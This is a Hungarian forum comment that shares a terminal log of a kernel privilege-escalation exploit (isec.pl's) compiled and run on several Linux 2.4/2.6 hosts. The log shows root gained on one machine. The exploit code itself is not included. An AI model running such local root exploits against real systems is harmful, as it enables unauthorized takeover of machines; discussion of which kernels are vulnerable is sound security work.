Hozzászólások
A változatosság kedvéért folytatnám a sort isec.pl-es srácok exploit-gyüjteményével...
Ezuttal nem linkelem az exploitokat, akit érdekel és kiakarja próbálni az úgyis megtalálja.
5-ből 1 szerveren sikerült root jogosultságot szerezni az exploit segítségével, de az 5-ből az exploit csak 1-re írta, hogy valóban nem vulnerable, az pedig a 2.6.3-as kernel volt.
De szerintem magáért beszél a log, nem kell magyarázni:
[code:1:7530dba5c2]
hunger@debian:~$ id
uid=1006(hunger) gid=1006(hunger) groups=1006(hunger)
hunger@debian:~$ gcc -O3 -static -fomit-frame-pointer proba.c -o proba
hunger@debian:~$ ./proba
[+] kernel 2.4.22 vulnerable: YES exploitable YES
MMAP #65530 0x50bfa000 - 0x50bfb000
[+] Success
debian:/home/hunger# id
uid=0(root) gid=0(root) groups=1006(hunger)
-----------------------------------------------------------
hunger@ownkern:~$ ./proba
[+] kernel 2.4.24 vulnerable: YES exploitable YES
MMAP #65530 0x50bfa000 - 0x50bfb000
[-] Failed
-----------------------------------------------------------
hunger@suse9:~> ./proba
[+] kernel 2.4.21-192-athlon vulnerable: YES exploitable YES
MMAP #65530 0x50bfa000 - 0x50bfb000
[-] Failed
-----------------------------------------------------------
hunger@grsec:~$ ./proba
[+] kernel 2.4.24-grsec vulnerable: YES exploitable YES
MMAP #65530 0x50bfa000 - 0x50bfb000
[+] Success
usage: ping [-LRdfnqrv] [-c count] [-i wait] [-l preload]
[-p pattern] [-s packetsize] [-t ttl] [-I interface address] host
hunger@grsec:~$ id
uid=5008(hunger) gid=4000(city) groups=4000(city)
-----------------------------------------------------------
hunger@new:~$ ./proba
[+] kernel 2.6.3 vulnerable: NO exploitable NO
[/code:1:7530dba5c2]
- A hozzászóláshoz be kell jelentkezni